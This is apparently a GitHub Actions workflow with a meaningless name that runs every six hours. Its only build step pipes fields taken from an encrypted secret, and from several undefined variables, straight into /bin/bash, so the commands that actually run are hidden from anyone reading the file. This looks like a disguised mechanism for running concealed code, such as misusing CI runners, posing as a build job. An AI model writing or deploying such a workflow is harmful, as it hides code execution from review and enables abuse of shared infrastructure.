name: wangmiaozhen1234

on:
  workflow_dispatch:
  schedule:
    - cron: '54 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangmiaozhen1234
        env:
          zyjor1: ${{ secrets.zyjor1 }}
        run: |
          echo $zyjor1 | jq -r .gsn82 | /bin/bash
          echo $h93 | jq -r .cd00748 | /bin/bash
          echo $bdrgd3684 | jq -r .bsd140 | /bin/bash
          echo $qra11 | jq -r .lz31 | /bin/bash
          echo $dw3 | jq -r .zftv90 | /bin/bash
          echo $ftynm708 | jq -r .fry37980 | /bin/bash
          echo $yn6 | jq -r .ihywi621 | /bin/bash
          echo $g1507 | jq -r .nvdgm054 | /bin/bash

